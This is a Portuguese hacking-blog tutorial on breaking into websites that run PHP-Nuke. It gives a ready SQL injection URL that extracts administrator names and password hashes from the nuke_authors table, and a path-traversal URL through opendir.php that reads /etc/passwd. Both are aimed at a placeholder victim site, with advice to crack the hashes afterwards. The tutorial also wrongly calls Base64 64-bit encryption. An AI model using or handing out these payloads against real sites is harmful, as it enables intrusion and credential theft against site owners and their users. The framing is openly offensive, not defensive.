Páginas

INVASAO DE SITES QUE USAO NUKE-PHP

INVASAO DE SITES QUE USAO NUKE-PHP
...........................................................................................................................................................................................................................................
Primeiro vamos ver o que é Nuke-PHP.
ajudahacker.br30.com
O PHP-Nuke é um software gratuito criado pelo venezuelano Francisco Burzi, baseado na linguagem PHP. Devido à facilidade de uso,

principalmente para publicação de notícias, tornou-se bastante popular e foi adotado por inúmeros sites.

Ele é um pacote de software que permite administrar portais , realizando tarefas como atualizações de notícias e manutenção de usuários .

Muito útil para os usuários de PHP Atualmente milhares de sites rodam o software PHP-Nuke.

.................................................................................................................................................................................................................................................
Principais falhas:

Falha 1

-A senha de administração do PHP-Nuke é guardada em um cookie e codificada em Base64, um método de criptografia de 64 bits

considerado pouco seguro.

O ataque aos servidores pode ser feito atraves de códigos HTTP (isto significa que voce pode injetar os códigos no proprio navegador, de

preferencia o IE)


Falha 2

-erro no arquivo "opendir.php"

(...)

$REQUEST_URI = strip_tags($REQUEST_URI);

$res = explode("$PHP_SELF?", $REQUEST_URI);

$odp_cat = $res[1];

if (substr($odp_cat,0,1) == "/") $odp_cat = substr($odp_cat,1);

(define $requesturl)

(...)


Pratica 1 :

Vamos visualizar senhas criptografadas do aministrador e usuarios on line no site usando um codigo exploit.

código:

modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1 UNION SELECT name,1,pwd,aid FROM nuke_authors

Site ( vítima ):

WWW.SITEPRASERINVADIDO.COM

Injection pronto:

WWW.SITEPRASERINVADIDO.COM/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1 UNION SELECT name,

1,pwd,aid FROM nuke_authors

Obseve as senhas criptografadas, basta um decripter.

pratica 2 :
Na segunda falha podemos usar o operdir.phpInocente demais operdir(abrir diretorio)

Basta um pouquinho de conhecimento de UNIX que da para abrir o que quiser dentro no servidor.
Eu não vou colocar nenhum site aqui não =), mas um exemplo de exploit para localizar senhas fica assim:

/WWW.SITEPRASERINVADIDO.COM/opendir.php?requesturl=/etc/passwd

.......................................................................................................................................................................................................................................................

Este tipo de falha NÃO é uma coisa recente, faz muito tempo que existe, as ultimas versões do NUKE-PHP nem contem mais falhas